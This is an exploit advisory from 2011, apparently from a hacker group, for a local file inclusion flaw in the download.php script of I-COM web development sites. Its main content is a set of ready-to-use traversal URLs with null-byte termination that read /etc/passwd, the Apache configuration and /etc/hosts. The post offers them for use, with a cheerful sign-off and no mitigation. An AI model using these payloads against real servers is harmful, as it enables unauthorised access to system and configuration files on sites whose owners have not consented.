> #########################################################################
>
> [+] Exploit Title : I-COM web Development LFI Vulnerability
> [~] Author : ThunDEr HeaD
> [~] Contact : thunderhead10@gmail.com
> [~] Date : 10-01-2011
> [~] HomePage : www.indishell.in
> [~] Verstion : 1.0
> [~] Tested on : Sites By I-com
> [~] Vulnerability Style : local file inclusion
> [~] Vulnerability Dir : Directory traversal
>
> #########################################################################
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~[Greetz To]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>               ----==  INDIAN CYBER ARMY ==----
>
> We Are: -[SiLeNtp0is0n]- , stRaNgEr , inX_rOot , NEO H4cK3R , DarkL00k , Mahi
> eXeSoul , G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI ,Jackh4xor , Th3 RDX
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~[EXPLOIT]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> ---==[local file inclusion]==---
>
> [#] Go to the URL:
>
>     http://server/i-com/download.php?dfile=
>
> [#] Apply these code(s) :
>
>     ../../../../../../../../etc/passwd
>
>     http://server/i-com/download.php?dfile=../../../../../../../../etc/passwd%00
>
>     http://server/i-com/download.php?dfile=../../../../../../../../etc/httpd/conf/httpd.conf%00
>
>     http://server/i-com/download.php?dfile=../../../../../../../../etc/hosts%00
>
>
>      Enj0y! :D
>
>
> [#] DOne now time to rock \m/
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> Bug discovered : 10 feb 2011
>
> finish(0);
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> #End 0Day#